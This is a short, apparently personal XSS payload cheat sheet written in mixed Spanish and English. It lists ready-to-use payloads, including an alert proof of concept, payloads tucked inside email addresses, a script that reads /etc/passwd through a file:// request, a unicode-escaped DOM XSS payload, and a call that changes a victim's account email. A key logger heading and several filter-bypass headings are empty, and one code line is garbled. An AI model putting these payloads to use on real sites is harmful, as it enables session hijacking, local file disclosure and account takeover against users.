✏️XSS

I am the xssrat

Simple XSS PoC:

<script>alert('uwu')</script>

XSS en campo EMAIL:

test+(<script>alert(uwu)</script>)@email.com
test@email(<script>alert(uwu)</script>).com
"<script>alert(uwu)</script>"@email.com

Leer Archivos Locales:

<script>
x=new XMLHttpRequest;
x.onload=function(){document.write(btoa(this.responseText))};
http://x.open("GET","file:///etc/passwd");x.send();
</script>

DOM XSS

?parametro=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e

Cambiar Email:

<script>user.changeEmail('[email protected]');</script>

Key Logger

----------------------------------------------------------------------------

  • dev tool > STORAGE > HTTPonly en FALSE para funcionar

----------------------------------------------------------------------------------------

Filter Bypass:

XSS Polyglot:

Cerrando Tags:

JS code:

Script banned:

‘<>’ Banned:

Última actualización